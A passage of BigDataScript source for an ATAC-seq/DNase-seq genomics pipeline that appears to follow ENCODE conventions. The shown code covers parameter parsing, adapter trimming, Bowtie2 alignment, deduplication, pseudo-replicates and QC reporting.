(-smooth_win 73 -idr_thresh 0.05 -multimapping 4) for ENCODE. no_browser_tracks := false help Disable generation of genome browser tracks (workaround for bzip2 shared library issue). overlap_pval_thresh := 0.01 help p-val threshold for overlapped peaks (default: 0.01). macs2_pval_thresh := 0.01 help MACS2 p-val threshold for calling peaks (default: 0.1). macs2_pval_thresh_bw := 0.01 help MACS2 p-val threshold for generating BIGWIG signal tracks (default: 0.1). enable_idr := false help Enable IDR on called peaks. auto_detect_adapter := false help Automatically find and trim adapters. adjust_bedpe := false // help (BETA) adjust BEDPE (by Daniel Kim). exclude_ppr_in_naive_overlap := false //help Exclude peaks from pooled pseudo replicates in naive overlap. This flag works for multiple replicate case only. disable_gb_peak := true // disable gapped/broad peak generation help() // show help contexts include "modules/pipeline_template.bds" include "modules/input.bds" include "modules/input_adapter.bds" include "modules/align_bowtie2.bds" include "modules/align_trim_adapter.bds" include "modules/align_etc.bds" include "modules/postalign_bam.bds" include "modules/postalign_bed.bds" include "modules/postalign_xcor.bds" include "modules/callpeak_macs2_atac.bds" include "modules/callpeak_naive_overlap.bds" include "modules/callpeak_idr.bds" include "modules/callpeak_blacklist_filter.bds" include "modules/callpeak_bigbed.bds" include "modules/ataqc.bds" include "modules/ENCODE_accession.bds" // Important output file names are stored in global variables (usually a string map string{} with a key with replicate id, pair id) // e.g. filt_bam{"1"} = filtered bam for replicate 1, peak_pr1{"2"} = peak file for pseudo replicate 1 of replicate 2 string{} fastq, align_log, flagstat_qc, bam, filt_bam, dup_qc, flagstat_nodup_qc, pbc_qc, xcor_qc, xcor_plot string{} final_tag, final_tag_pr1, final_tag_pr2 string final_tag_pooled, final_tag_ppr1, final_tag_ppr2 string{} peak, peak_001, peak_pr1, peak_pr2 string peak_pooled, peak_pooled_001, peak_ppr1, peak_ppr2 string{} gpeak, gpeak_001, gpeak_pr1, gpeak_pr2 string gpeak_pooled, gpeak_pooled_001, gpeak_ppr1, gpeak_ppr2 string num_peak_log string{} pval_bigwig_001, fc_bigwig_001 string{} idr_tr, idr_pr, idr_tr_png, idr_pr_png, idr_tr_log, idr_pr_log string idr_ppr, idr_opt, idr_consv, idr_ppr_png, idr_ppr_log string idr_qc string{} idr_qc_FRiP string{} peak_overlap_tr, peak_overlap_pr string peak_overlap_ppr, peak_overlap_opt, peak_overlap_consv string peak_overlap_qc string{} peak_overlap_qc_FRiP string{} ataqc_qc main() void main() { // atac pipeline starts here init_atac() chk_param() // check if parameters are valid chk_adapters() chk_input( true_rep, false ) do_align() call_peaks() read_input_peak() // if inputs are peaks, read them do_naive_overlap() do_idr() wait log_number_of_peaks() ataqc() // blacklist-filter peaks and also make ENCODE accession metadata for them filter_peak_and_convert_to_bigbed() tar_all_logs() ENCODE3_overall_qc() report() } void init_atac() { read_conf_atac() init_etc_atac() print_atac() init_filetable() } void read_conf_atac() { type = get_conf_val( type, ["type"] ) align = get_conf_val_bool( align, ["align"] ) true_rep = get_conf_val_bool( true_rep, ["true_rep"] ) no_ataqc = get_conf_val_bool( no_ataqc, ["no_ataqc"] ) no_xcor = get_conf_val_bool( no_xcor, ["no_xcor"] ) csem = get_conf_val_bool( csem, ["csem"] ) smooth_win = get_conf_val( smooth_win, ["smooth_win"] ) dnase_seq = get_conf_val_bool( dnase_seq, ["dnase_seq"] ) idr_thresh = get_conf_val_real( idr_thresh, ["idr_thresh"] ) subsample_xcor = get_conf_val( subsample_xcor, ["subsample_xcor"] ) subsample = get_conf_val( subsample, ["subsample"] ) ENCODE3 = get_conf_val_bool( ENCODE3, ["ENCODE3"] ) ENCODE = get_conf_val_bool( ENCODE, ["ENCODE","ENCODE1"] ) no_browser_tracks = get_conf_val_bool( no_browser_tracks, ["no_browser_tracks"] ) overlap_pval_thresh = get_conf_val_real( overlap_pval_thresh, ["overlap_pval_thresh"] ) // exclude_ppr_in_naive_overlap = get_conf_val_bool( exclude_ppr_in_naive_overlap, ["exclude_ppr_in_naive_overlap"] ) macs2_pval_thresh = get_conf_val_real( macs2_pval_thresh, ["macs2_pval_thresh"] ) macs2_pval_thresh_bw = get_conf_val_real( macs2_pval_thresh_bw, ["macs2_pval_thresh_bw"] ) enable_idr = get_conf_val_bool( enable_idr, ["enable_idr"] ) auto_detect_adapter = get_conf_val_bool( auto_detect_adapter, ["auto_detect_adapter"] ) // adjust_bedpe = get_conf_val_bool( adjust_bedpe, ["adjust_bedpe"] ) } void init_etc_atac() { default_is_pe = true speak_xcor = 0 // set fragment length explicitly as zero for cross corr. analysis } void print_atac() { print( "\n\n== atac pipeline settings\n") print( "Type of pipeline\t\t\t: $type\n") print( "Align only\t\t\t\t: " + align + "\n") print( "# reads to subsample replicates (0 if no subsampling)\t: "+parse_number( subsample )+"\n") print( "# reads to subsample for cross-corr. analysis \t: " +parse_number( subsample_xcor)+"\n") print( "No pseudo replicates\t\t\t: $true_rep\n") print( "No ATAQC (advanced QC report)\t\t: $no_ataqc\n") print( "No Cross-corr. analysis\t\t\t: $no_xcor\n") print( "Use CSEM for alignment\t\t\t: $csem\n") print( "Smoothing window for MACS2\t\t: $smooth_win\n") print( "DNase Seq\t\t\t\t: $dnase_seq\n") print( "IDR threshold\t\t\t\t: $idr_thresh\n" ) print( "Force to use ENCODE3 parameter set\t: $ENCODE3\n" ) print( "Force to use ENCODE parameter set\t: $ENCODE\n" ) print( "Disable genome browser tracks\t: $no_browser_tracks\n" ) print( "p-val thresh. for overlapped peaks\t: $overlap_pval_thresh\n") // print( "Exclude ppr in naive overlap\t: $exclude_ppr_in_naive_overlap\n") print( "MACS2 p-val thresh. for peaks\t: $macs2_pval_thresh\n") print( "MACS2 p-val thresh. for BIGWIGs\t\t: $macs2_pval_thresh_bw\n") print( "Enable IDR on called peaks\t: $enable_idr\n") print( "Automatically find/trim adapters\t: $auto_detect_adapter\n") // print( "(BETA) adjust BEDPE (by Daniel Kim)\t: $adjust_bedpe\n") if ( dnase_seq ) type = "dnase-seq" } void init_filetable() { // init file table labels in HTML report // add label to graphviz // : Items in filetable will be sorted in the ascending order of rank // : Items added later will have higher rank // Level 1 add_label_to_table("Raw reads") add_label_to_table("Alignment") add_label_to_table("Signal tracks") add_label_to_table("Peaks") add_label_to_table("QC and logs") // Level 2 for (int i=1; i<=100; i++) \ add_label_to_table("Replicate $i") add_label_to_table("True replicates") add_label_to_table("Pooled replicate") add_label_to_table("Pseudo-replicates") add_label_to_table("Pooled pseudo-replicate") add_label_to_table("Pooled pseudo-replicates") add_label_to_table("Optimal set") add_label_to_table("Conservative set") add_label_to_table("Naive overlap") add_label_to_table("MACS2") add_label_to_table("IDR") // Level 2 or 3 add_label_to_table("Pseudo-replicate 1") add_label_to_table("Pseudo-replicate 2") add_label_to_table("Pooled pseudo-replicate 1") add_label_to_table("Pooled pseudo-replicate 2") for (int i=1; i<=20; i++) \ for (int j=i+1; j<=20; j++) \ add_label_to_table("Rep. $i vs Rep. $j") // Higher levels add_label_to_table("IDR QC") add_label_to_table("Fastq") add_label_to_table("Fastq 1") add_label_to_table("Fastq 2") add_label_to_table("Trimmed fastq") add_label_to_table("Trimmed fastq 1") add_label_to_table("Trimmed fastq 2") add_label_to_table("Bowtie2 map. log") add_label_to_table("Bam") add_label_to_table("Filtered bam") add_label_to_table("Sorted bam") add_label_to_table("Dedup. log") add_label_to_table("Bowtie2 map. flagstat log") add_label_to_table("PBC log") add_label_to_table("Bedpe") add_label_to_table("Subsampled bedpe") add_label_to_table("Tag-align") add_label_to_table("Subsampled tag-align") add_label_to_table("Cross-corr. log") add_label_to_table("Cross-corr. plot") add_label_to_table("P-value") add_label_to_table("Fold enrichment") add_label_to_table("Narrow peak") add_label_to_table("Gapped peak") add_label_to_table("Filtered narrow peak") add_label_to_table("Filtered gapped peak") add_label_to_table("IDR peak") add_label_to_table("Peak") add_label_to_table("Filtered peak") add_label_to_table("Filtered gapped peak") add_label_to_table("ATAQC") add_label_to_table("IDR plot") add_label_to_table("Unthresholded IDR peak") // add label to graphviz (short name, long name) for (int i=1; i<=50; i++) { add_label_to_graph("rep$i", "Replicate $i") add_label_to_graph("rep$i-pr1", "Pseudo-replicate 1 for rep. $i") add_label_to_graph("rep$i-pr2", "Pseudo-replicate 2 for rep. $i") add_label_to_graph("rep$i-pr", "Pseudo replicates for rep. $i") for (int j=1; j<=20; j++) { add_label_to_graph("rep$i-rep$j", "Rep. $i vs. Rep. $j") } } add_label_to_graph("pooled_rep", "Pooled replicate") add_label_to_graph("ppr", "Pooled pseudo-replicates") add_label_to_graph("ppr1", "Pooled pseudo-replicate 1") add_label_to_graph("ppr2", "Pooled pseudo-replicate 2") } void chk_param() { print( "\n== checking atac parameters ...\n" ); if ( has_input_fastq() ) chk_align_bwt2() if ( !align ) chk_callpeak_macs2() if ( enable_idr ) chk_idr() if ( !no_ataqc ) { no_ataqc = !chk_ataqc() } if ( has_pe_input_tag() && subsample > 0 ) { print("Warning: Cannot subsample paired end tagaligns. Disabling subsampling...\n") subsample = 0 } if ( !has_input_fastq() && !no_ataqc ) { print("Warning: ATAQC is available for fastq inputs only. Disabling ATAQC...\n") no_ataqc = true } if ( has_pe_input_fastq() && csem ) { error("CSEM (-csem) is not available for paired end fastqs!\n") } if ( ENCODE ) { print("Info: ENCODE flag is on (-smooth_win 73 -idr_thresh 0.05 -multimapping 4).\n") smooth_win = 73 idr_thresh = 0.05 multimapping = 4 } if ( ENCODE3 ) { print("Info: ENCODE3 flag is on (-smooth_win 73 -idr_thresh 0.05 -multimapping 4).\n") smooth_win = 73 idr_thresh = 0.05 multimapping = 4 } //ENCODE_assay_category = "DNA accessibility" if ( dnase_seq ) { ENCODE_assay_title = "DNase-seq" } else { ENCODE_assay_title = "ATAC-seq" } } void chk_adapters() { print( "\n== checking adapters to be trimmed ...\n" ); // check adapters for ( int rep=1; rep <= get_num_rep(); rep++) { if ( is_input_fastq( rep ) ) { fastqs_R1 := get_fastq( 0, rep, 1 ) adapters_R1 := get_adapter( 0, rep, 1 ) if ( is_se( rep ) ) { //SE print("Rep$rep adapters (SE) : \n") for ( string pool_id : fastqs_R1.keys() ) { if ( !adapters_R1.hasKey(pool_id) ) { if ( auto_detect_adapter ) { print("\t$pool_id: automatically detected and trimmed.\n") } else { print("\t$pool_id: no adapter specified.\n") } } else { adapter := adapters_R1{pool_id} print("\t$pool_id: $adapter\n") } } } else { //PE print("Rep$rep R1 adapters (PE) : \n") for ( string pool_id : fastqs_R1.keys() ) { if ( !adapters_R1.hasKey(pool_id) ) { if ( auto_detect_adapter ) { print("\t$pool_id: automatically detected and trimmed.\n") } else { print("\t$pool_id: no adapter specified.\n") } } else { adapter := adapters_R1{pool_id} print("\t$pool_id: $adapter\n") } } fastqs_R2 := get_fastq( 0, rep, 2 ) adapters_R2 := get_adapter( 0, rep, 2 ) print("Rep$rep R2 adapters (PE) : \n") for ( string pool_id : fastqs_R2.keys() ) { if ( !adapters_R2.hasKey(pool_id) ) { if ( auto_detect_adapter ) { print("\t$pool_id: automatically detected and trimmed.\n") } else { print("\t$pool_id: no adapter specified.\n") } } else { adapter := adapters_R2{pool_id} print("\t$pool_id: $adapter\n") } } if ( !equals( adapters_R1.keys(), adapters_R2.keys() ) ) { error("Match pooling IDs (-fastq[REP_ID]_[PAIR_ID]:[POOL_ID]) in both pairs.\n") } } //if ( !is_se( rep ) && fastqs.size() < 2 ) \ // error("A pair of fastqs are needed for replicate $rep (if it's single-ended add '-se')\n") } } } void do_align() { if ( is_input_peak() ) return // filesize of input ( map with key $rep ) int{} filesize for ( int rep=1; rep <= get_num_rep(); rep++) { // check file size to distribute nth to each nth_app // determine # threads for each app related to alignment // get file size in bytes if ( is_input_fastq( rep ) ) { fastqs := get_fastqs( rep ) filesize{rep} = (fastqs[0]).size() if ( fastqs.size() > 1) filesize{rep} += (fastqs[1]).size()*3 // multiply 3 to allocate more cpus for align } else if ( is_input_bam( rep ) ) filesize{rep} = (get_bam( 0, rep )).size() else if ( is_input_filt_bam( rep ) ) filesize{rep} = (get_filt_bam( 0, rep )).size() else if ( is_input_tag( rep ) ) filesize{rep} = (get_tag( 0, rep )).size()*10 } //// distribute # threads for each replicate nth_rep := distribute_nonzero( nth, filesize ) // distribute # threads according to input filesize for (int rep=1; rep<=get_num_rep(); rep++) { if ( no_par ) do_align( rep, nth_rep{rep} ) else par do_align( rep, nth_rep{rep} ) } wait print( "\n== Done do_align()\n" ) } void do_align( int rep, int nth_rep ) { if ( is_se( rep ) ) align_SE( rep, nth_rep ) else align_PE( rep, nth_rep ) } void align_SE( int rep, int nth_rep ) { group := get_group_name( rep ) long := get_long_group_name( rep ) aln_o_dir := mkdir( "$out_dir/align/$group" ) // create align output directory qc_o_dir := mkdir( "$out_dir/qc/$group" ) // create qc output dir. string bam_, read_length_log, flagstat_qc_ string{} fastqs, trimmed_fastqs, adapters // format: key=pool_id, val=fastq_path or adapter string[] fastqs_arr if ( is_input_fastq( rep ) ) { fastqs = get_fastq( 0, rep, 1 ) adapters = get_adapter( 0, rep, 1 ) fastqs_arr = map_to_array( fastqs ) // string[] trimmed_fastqs for ( string pool_id : fastqs.keys() ) { // if ( adapters.size()==0 && !auto_detect_adapter ) { if ( !adapters.hasKey(pool_id) && !auto_detect_adapter ) { trimmed_fastqs{pool_id} = fastqs{pool_id} print("\nSpecified adapter for $group:$pool_id (SE) : None\n") } else { string adapter if ( !adapters.hasKey(pool_id) && auto_detect_adapter ) { string adapter_log, tid (adapter_log, tid) = detect_adapter( fastqs{pool_id}, qc_o_dir, group ) wait tid adapter = parse_adapter_log( adapter_log ) if ( adapter ) { print("\nDetected adapter for $group:$pool_id (SE) : $adapter\n") } else { print("\nDetected adapter for $group:$pool_id (SE) : No adapter detected. Skip trimming.\n") } } else { adapter = adapters{pool_id} print("\nSpecified adapter for $group:$pool_id (SE) : $adapter\n") } if ( adapter ) { suffix := (pool_id == "00" ? "" : ":$pool_id") trimmed_fastqs{pool_id} = \ trim_adapters( fastqs{pool_id}, adapter, aln_o_dir, group, suffix ) } else { trimmed_fastqs{pool_id} = fastqs{pool_id} } } } wait string p1 trimmed_fastqs_arr := map_to_array(trimmed_fastqs) if ( trimmed_fastqs.size() > 1 ) { // if multiple fastqs are given, pool trimmed fastqs p1 = pool_fastq( trimmed_fastqs_arr, aln_o_dir, group ) // add_file_to_report( p1, "pooled\\nfastq" , group, "Raw reads/$long/Pooled fastq" ) wait } else { p1 = trimmed_fastqs_arr[0] } fastq{rep} = p1 string align_log_ read_length_log = get_read_length_log( p1, qc_o_dir, group ) if ( csem ) { ( bam_, align_log_ ) = bowtie2_csem( p1, aln_o_dir, qc_o_dir, group, nth_rep ) } else { ( bam_, align_log_ ) = bowtie2( p1, aln_o_dir, qc_o_dir, group, nth_rep ) } wait align_log{rep} = align_log_ add_file_to_table( align_log_, "QC and logs/$long/Bowtie2 map. log") flagstat_qc_ = samtools_flagstat_bam( bam_, qc_o_dir, group ) wait flagstat_qc{rep} = flagstat_qc_ add_file_to_table( flagstat_qc_, "QC and logs/$long/Bowtie2 map. flagstat log") // add to report tmp_log := parse_flagstat( flagstat_qc_ ) raw_reads := metric_prefix( parse_int( tmp_log{"total"} ) ) mapped_reads := metric_prefix( parse_int( tmp_log{"mapped"} ) ) if ( trimmed_fastqs_arr.size() > 1 ) { // if multiple fastqs are given, pool trimmed fastqs for ( int i=0; i<fastqs_arr.size(); i++) { suffix := fastqs_arr.size()==1 ? "" : ":$i" add_file_to_report( fastqs_arr[i], "fastq$suffix", group, \ "Raw reads/$long/Fastq$suffix" ) if ( trimmed_fastqs_arr[i]!=fastqs_arr[i] ) { add_file_to_report( trimmed_fastqs_arr[i], "trimmed\\nfastq$suffix", group, \ "Raw reads/$long/Trimmed fastq$suffix" ) } } add_file_to_report( p1, "pooled\\nfastq" + (raw_reads ? "\\n$raw_reads" : ""), group, \ "Raw reads/$long/Pooled fastq"+ (raw_reads ? " ($raw_reads)" : "") ) } else { for ( int i=0; i<fastqs_arr.size(); i++) { if ( trimmed_fastqs_arr[i]==fastqs_arr[i] ) { add_file_to_report( fastqs_arr[i], "fastq" + (raw_reads ? "\\n$raw_reads" : ""), group, \ "Raw reads/$long/Fastq"+ (raw_reads ? " ($raw_reads)" : "") ) } else { add_file_to_report( fastqs_arr[i], "fastq", group, \ "Raw reads/$long/Fastq" ) add_file_to_report( trimmed_fastqs_arr[i], "trimmed\\nfastq" + (raw_reads ? "\\n$raw_reads" : ""), group, \ "Raw reads/$long/Trimmed fastq"+ (raw_reads ? " ($raw_reads)" : "") ) } } } bam{rep} = bam_ add_file_to_report( bam_, "bam" + (mapped_reads ? "\\n$mapped_reads" : ""), group, \ "Alignment/$long/Bam" + (mapped_reads ? " ($mapped_reads)" : "") ) } string filt_bam_, dup_qc_, pbc_qc_, flagstat_nodup_qc_ if ( is_input_fastq( rep ) || is_input_bam( rep ) ) { if ( is_input_bam( rep ) ) { bam_ = get_bam( 0, rep ) bam{rep} = bam_ } string deduped_reads if ( no_dup_removal ) { string tmp ( filt_bam_, tmp ) = dedup_bam( bam_, aln_o_dir, qc_o_dir, group, nth_rep ) wait } else { ( filt_bam_, dup_qc_, flagstat_nodup_qc_, pbc_qc_ ) \ = dedup_bam( bam_, aln_o_dir, qc_o_dir, group, nth_rep ) dup_qc{rep} = dup_qc_ pbc_qc{rep} = pbc_qc_ flagstat_nodup_qc{rep} = flagstat_nodup_qc_ add_file_to_table( dup_qc_, "QC and logs/$long/Dedup. log") add_file_to_table( pbc_qc_, "QC and logs/$long/PBC log") add_file_to_table( flagstat_nodup_qc_, "QC and logs/$long/Filtered flagstat log") wait tmp_log := parse_flagstat( flagstat_nodup_qc_ ) deduped_reads = metric_prefix( parse_int( tmp_log{"total"} ) ) } // add to report filt_bam{rep} = filt_bam_ add_file_to_report( filt_bam_, "filt. bam" + (deduped_reads ? "\\n$deduped_reads" : ""), group, \ "Alignment/$long/Filtered & deduped bam" + (deduped_reads ? " ($deduped_reads)" : "") ) // For ENCODE accession, use different step name for single rep case if ( is_input_fastq( rep ) ) { string ENCODE_step_name if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1" else ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1" if ( fastqs.size() > 0 ) \ add_ENCODE_metadata_to_summary_json( "bam", "", "alignments", \ ENCODE_step_name, filt_bam_, fastqs_arr ) if ( flagstat_qc_ ) { add_ENCODE_quality_metrics_to_summary_json( "samtools_flagstats_quality_metric", \ ENCODE_step_name, [filt_bam_], [flagstat_qc_] ) } } } string tag if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) ) { if ( is_input_filt_bam( rep ) ) { filt_bam_ = get_filt_bam( 0, rep ) filt_bam{rep} = filt_bam_ } tag = bam_to_tag( filt_bam_, aln_o_dir, group ) wait } string final_tag_, final_tag_pr1_, final_tag_pr2_ if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) || is_input_tag( rep ) ) { if ( is_input_tag( rep ) ) tag = get_tag( 0, rep ) string subsampled_tag if ( parse_number( subsample ) != 0 ) { subsampled_tag = subsample_tag( tag, parse_number( subsample ), false, aln_o_dir, group ) wait } else { subsampled_tag = tag } if ( is_dnase_seq() ) { final_tag_ = subsampled_tag } else { final_tag_ = tn5_shift_tag( subsampled_tag, aln_o_dir, group ) } final_tag{rep} = final_tag_ add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" ) wait if ( !true_rep ) { aln_pr1_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr1" ) aln_pr2_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr2" ) ( final_tag_pr1_, final_tag_pr2_ ) = spr( final_tag_, aln_pr1_o_dir, aln_pr2_o_dir, group ) final_tag_pr1{rep} = final_tag_pr1_ final_tag_pr2{rep} = final_tag_pr2_ add_file_to_report( final_tag_pr1_, "tag-align", "$group-pr1", "Alignment/Pseudo-replicates/$long/Pseudo-replicate 1/Tag-align" ) add_file_to_report( final_tag_pr2_, "tag-align", "$group-pr2", "Alignment/Pseudo-replicates/$long/Pseudo-replicate 2/Tag-align" ) wait } if ( !no_xcor ) { // cross-corr. analysis subsampled_tag_xcor := subsample_tag( final_tag_, parse_number( subsample_xcor ), true, aln_o_dir, group ) wait // xcor string xcor_qc_, xcor_plot_ ( xcor_qc_, xcor_plot_ ) = xcor( subsampled_tag_xcor, qc_o_dir, group, nth_rep ) xcor_qc{rep} = xcor_qc_ xcor_plot{rep} = xcor_plot_ add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" ) add_file_to_table( xcor_plot_, "QC and logs/$long/Cross-corr. plot" ) wait string ENCODE_step_name if ( pbc_qc_ && read_length_log ) { if ( get_num_rep() == 1 ) \ ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1" else \ ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1" add_ENCODE_quality_metrics_to_summary_json( "complexity_xcorr_quality_metric", \ ENCODE_step_name, \ [filt_bam_], [pbc_qc_, xcor_qc_, read_length_log], [ "false", xcor_plot_] ) } } } } void align_PE( int rep, int nth_rep ) { group := get_group_name( rep ) long := get_long_group_name( rep ) aln_o_dir := mkdir( "$out_dir/align/$group" ) // create align output directory qc_o_dir := mkdir( "$out_dir/qc/$group" ) // create qc output dir. string bam_, align_log_, read_length_log, flagstat_qc_ string{} fastqs_pair1, fastqs_pair2, adapters_pair1, adapters_pair2 string{} trimmed_fastqs_pair1, trimmed_fastqs_pair2 string[] fastqs_pair1_arr, fastqs_pair2_arr if ( is_input_fastq( rep ) ) { fastqs_pair1 = get_fastq( 0, rep, 1 ) fastqs_pair2 = get_fastq( 0, rep, 2 ) fastqs_pair1_arr = map_to_array(fastqs_pair1) fastqs_pair2_arr = map_to_array(fastqs_pair2) adapters_pair1 = get_adapter( 0, rep, 1 ) adapters_pair2 = get_adapter( 0, rep, 2 ) string{} trimmed_fastqs_pair1, trimmed_fastqs_pair2 if ( fastqs_pair1.size() != fastqs_pair2.size() ) { error("Number of fastqs to be pooled for pair 1 and pair 2 do not match!\n") } // for ( int i=0; i<fastqs_pair1.size(); i++) { for ( string pool_id : fastqs_pair1.keys() ) { if ( !fastqs_pair2.hasKey(pool_id) ) error("Paired fastq not found for "+fastqs_pair1{pool_id}+"\n") if ( !(adapters_pair1.hasKey(pool_id) && adapters_pair2.hasKey(pool_id)) \ && !auto_detect_adapter ) { trimmed_fastqs_pair1{pool_id} = fastqs_pair1{pool_id} trimmed_fastqs_pair2{pool_id} = fastqs_pair2{pool_id} print("\nSpecified adapter for $group:$pool_id (PE) : None\n") } else { string adapter1, adapter2 if ( !(adapters_pair1.hasKey(pool_id) && adapters_pair2.hasKey(pool_id)) \ && auto_detect_adapter ) { string adapter_log1, adapter_log2, tid1, tid2 (adapter_log1, tid1) = detect_adapter( fastqs_pair1{pool_id}, qc_o_dir, group ) (adapter_log2, tid2) = detect_adapter( fastqs_pair2{pool_id}, qc_o_dir, group ) wait [tid1, tid2] adapter1 = parse_adapter_log( adapter_log1 ) adapter2 = parse_adapter_log( adapter_log2 ) if ( adapter1 && adapter2 ) { print("\nDetected adapter for $group:$pool_id (PE) : $adapter1, $adapter2\n") } else { print("\nDetected adapter for $group:$pool_id (PE) : No adapter detected. Skip trimming (fastq1: $adapter1, fastq2: $adapter2).\n") } } else if ( adapters_pair1.hasKey(pool_id) && adapters_pair2.hasKey(pool_id) ) { adapter1 = adapters_pair1{pool_id} adapter2 = adapters_pair2{pool_id} print("\nSpecified adapter for $group:$pool_id (PE) : $adapter1, $adapter2\n") } if ( adapter1 && adapter2 ) { suffix := fastqs_pair1.size()==1 ? "" : ":$pool_id" ( trimmed_fastqs_pair1{pool_id}, trimmed_fastqs_pair2{pool_id} ) \ = trim_adapters_PE( fastqs_pair1{pool_id}, fastqs_pair2{pool_id}, \ adapter1, adapter2, aln_o_dir, group, suffix ) // add_file_to_report( p1, "trimmed\\nfastq 1$suffix", group, "Raw reads/$long/Trimmed fastq 1$suffix" ) // add_file_to_report( p2, "trimmed\\nfastq 2$suffix", group, "Raw reads/$long/Trimmed fastq 2$suffix" ) } else { trimmed_fastqs_pair1{pool_id} = fastqs_pair1{pool_id} trimmed_fastqs_pair2{pool_id} = fastqs_pair2{pool_id} } } } wait string p1, p2 trimmed_fastqs_pair1_arr := map_to_array(trimmed_fastqs_pair1) trimmed_fastqs_pair2_arr := map_to_array(trimmed_fastqs_pair2) if ( trimmed_fastqs_pair1.size() > 1 ) { // if multiple fastqs are given, pool trimmed fastqs p1 = pool_fastq( trimmed_fastqs_pair1_arr, aln_o_dir, group ) p2 = pool_fastq( trimmed_fastqs_pair2_arr, aln_o_dir, group ) // add_file_to_report( p1, "pooled\\nfastq 1" , group, "Raw reads/$long/Pooled fastq 1" ) // add_file_to_report( p2, "pooled\\nfastq 2" , group, "Raw reads/$long/Pooled fastq 2" ) wait } else { p1 = trimmed_fastqs_pair1_arr[0] p2 = trimmed_fastqs_pair2_arr[0] } fastq{rep+",1"} = p1 fastq{rep+",2"} = p2 read_length_log = get_read_length_log( p1, qc_o_dir, group ) ( bam_, align_log_ ) = bowtie2_PE( p1, p2, aln_o_dir, qc_o_dir, group, nth_rep ) wait align_log{rep} = align_log_ add_file_to_table( align_log_, "QC and logs/$long/Bowtie2 map. log") flagstat_qc_ = samtools_flagstat_bam( bam_, qc_o_dir, group ) wait flagstat_qc{rep} = flagstat_qc_ add_file_to_table( flagstat_qc_, "QC and logs/$long/Bowtie2 map. flagstat log") // add to report tmp_log := parse_flagstat( flagstat_qc_ ) raw_reads := metric_prefix( parse_int( tmp_log{"total"} ) ) half_raw_reads := metric_prefix( parse_int( tmp_log{"total"} )/2 ) if ( trimmed_fastqs_pair1.size() > 1 ) { for ( string pool_id : fastqs_pair1.keys() ) { suffix := fastqs_pair1.size()==1 ? "" : ":$pool_id" add_file_to_report( fastqs_pair1{pool_id}, "fastq 1$suffix", group, \ "Raw reads/$long/Fastq 1$suffix" ) add_file_to_report( fastqs_pair2{pool_id}, "fastq 2$suffix", group, \ "Raw reads/$long/Fastq 2$suffix" ) if ( trimmed_fastqs_pair1{pool_id}!=fastqs_pair1{pool_id} ) { add_file_to_report( trimmed_fastqs_pair1{pool_id}, "trimmed\\nfastq 1$suffix", group, \ "Raw reads/$long/Trimmed fastq 1$suffix" ) } if ( trimmed_fastqs_pair2{pool_id}!=fastqs_pair2{pool_id} ) { add_file_to_report( trimmed_fastqs_pair2{pool_id}, "trimmed\\nfastq 2$suffix", group, \ "Raw reads/$long/Trimmed fastq 2$suffix" ) } } add_file_to_report( p1, "pooled\\nfastq 1" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \ "Raw reads/$long/Pooled fastq 1"+ (half_raw_reads ? " ($half_raw_reads)" : "") ) add_file_to_report( p2, "pooled\\nfastq 2" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \ "Raw reads/$long/Pooled fastq 2"+ (half_raw_reads ? " ($half_raw_reads)" : "") ) } else { for ( string pool_id : fastqs_pair1.keys() ) { if ( trimmed_fastqs_pair1{pool_id}==fastqs_pair1{pool_id} ) { add_file_to_report( fastqs_pair1{pool_id}, "fastq 1" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \ "Raw reads/$long/Fastq 1"+ (half_raw_reads ? " ($half_raw_reads)" : "") ) } else { add_file_to_report( fastqs_pair1{pool_id}, "fastq 1", group, \ "Raw reads/$long/Fastq 1" ) add_file_to_report( trimmed_fastqs_pair1{pool_id}, "trimmed\\nfastq 1" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \ "Raw reads/$long/Trimmed fastq 1"+ (half_raw_reads ? " ($half_raw_reads)" : "") ) } if ( trimmed_fastqs_pair2{pool_id}==fastqs_pair2{pool_id} ) { add_file_to_report( fastqs_pair2{pool_id}, "fastq 2" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \ "Raw reads/$long/Fastq 2"+ (half_raw_reads ? " ($half_raw_reads)" : "") ) } else { add_file_to_report( fastqs_pair2{pool_id}, "fastq 2", group, \ "Raw reads/$long/Fastq 2" ) add_file_to_report( trimmed_fastqs_pair2{pool_id}, "trimmed\\nfastq 2" + (half_raw_reads ? "\\n$half_raw_reads" : ""), group, \ "Raw reads/$long/Trimmed fastq 2"+ (half_raw_reads ? " ($half_raw_reads)" : "") ) } } } mapped_reads := metric_prefix( parse_int( tmp_log{"mapped"} ) ) bam{rep} = bam_ add_file_to_report( bam_, "bam" + (mapped_reads ? "\\n$mapped_reads" : ""), group, \ "Alignment/$long/Bam" + (mapped_reads ? " ($mapped_reads)" : "") ) } string filt_bam_, dup_qc_, pbc_qc_, flagstat_nodup_qc_ if ( is_input_fastq( rep ) || is_input_bam( rep ) ) { if ( is_input_bam( rep ) ) { bam_ = get_bam( 0, rep ) bam{rep} = bam_ } string deduped_reads if ( no_dup_removal ) { string tmp (filt_bam_, tmp ) \ = dedup_bam_PE( bam_, aln_o_dir, qc_o_dir, group, nth_rep ) wait } else { (filt_bam_, dup_qc_, flagstat_nodup_qc_, pbc_qc_ ) \ = dedup_bam_PE( bam_, aln_o_dir, qc_o_dir, group, nth_rep ) dup_qc{rep} = dup_qc_ pbc_qc{rep} = pbc_qc_ flagstat_nodup_qc{rep} = flagstat_nodup_qc_ add_file_to_table( dup_qc_, "QC and logs/$long/Dedup. log") add_file_to_table( pbc_qc_, "QC and logs/$long/PBC log") add_file_to_table( flagstat_nodup_qc_, "QC and logs/$long/Filtered flagstat log") wait tmp_log := parse_flagstat( flagstat_nodup_qc_ ) deduped_reads = metric_prefix( parse_int( tmp_log{"total"} ) 